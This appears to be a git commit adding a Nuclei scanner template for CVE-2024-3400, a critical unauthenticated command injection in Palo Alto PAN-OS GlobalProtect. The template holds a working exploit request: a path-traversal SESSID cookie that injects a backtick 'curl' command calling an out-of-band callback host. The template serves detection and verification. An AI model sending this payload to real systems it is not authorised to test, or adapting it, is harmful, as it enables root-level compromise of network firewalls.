Merge pull request #9590 from projectdiscovery/parthmalhotra-patch-2

Create CVE-2024-3400.yaml
patch-1
Ritik Chaddha 2024-04-16 23:39:04 +05:30 committed by GitHub
commit efaeab60fb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,50 @@
id: CVE-2024-3400
info:
name: GlobalProtect - OS Command Injection
author: pdresearch,parthmalhotra
severity: critical
description: |
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
reference:
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/k4nfr3/nmap-scripts
- https://github.com/0x0d3ad/CVE-2024-3400
- https://github.com/FoxyProxys/CVE-2024-3400
- https://github.com/MrR0b0t19/CVE-2024-3400
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-3400
cwe-id: CWE-77
epss-score: 0.00371
epss-percentile: 0.72356
cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-631559155"
product: pan-os
vendor: paloaltonetworks
tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev
http:
- raw:
- |
GET /global-protect/login.esp HTTP/1.1
Host: {{Hostname}}
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`;
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "GlobalProtect Portal"